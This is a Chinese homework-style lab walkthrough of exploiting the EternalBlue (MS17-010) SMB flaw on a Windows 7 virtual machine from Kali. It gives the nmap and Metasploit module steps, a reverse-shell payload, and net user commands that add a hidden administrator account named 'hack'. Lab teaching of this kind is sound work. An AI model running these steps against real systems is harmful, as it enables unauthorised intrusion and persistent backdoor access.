简单写一下以前老师布置的作业,如有错误请指正!
一、什么是永恒之蓝
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
二、环境准备
1.一台win7虚拟机作为被攻击机(ip:192.168.47.145),一台kali作为攻击机(ip:192.168.47.130)
2.两台机器可以互相pingt通
3.win7关闭防火墙
三、实验流程
1.打开kali,使用nmap扫描win7是否打开了445端口
nmap -sV -p 445 192.168.47.145
2.445端口已打开,打开MSF工具,查看是否有永恒之蓝漏洞模块
search ms17_010
3.使用auxiliary/scanner/smb/smb_ms17_010查看是否win7是否存在永恒之蓝,将攻击IP设置为win7IP
4.发现可以利用,使用exploit/windows/smb/ms17_010_eternalblue模块进行攻击
5.攻击荷载选择payload/generic/shell_reverse_tcp,用来生成shell
6.配置好攻击IP、攻击荷载,然后run起来
7.攻击成功,查看当前IP,发现目前确实是win7的ip了
8.反弹shell
9.添加一个用户hack,密码1234
net user hack 1234 /add
10.将我们新添加的用户hack添加至管理员用户
net localgroup administrators hack /add
11.到win7机看一下,发现用户hack确实已经添加上了
12.向win7上传文件
13.shell.txt上传成功
还有很多操作大家可以自由发挥~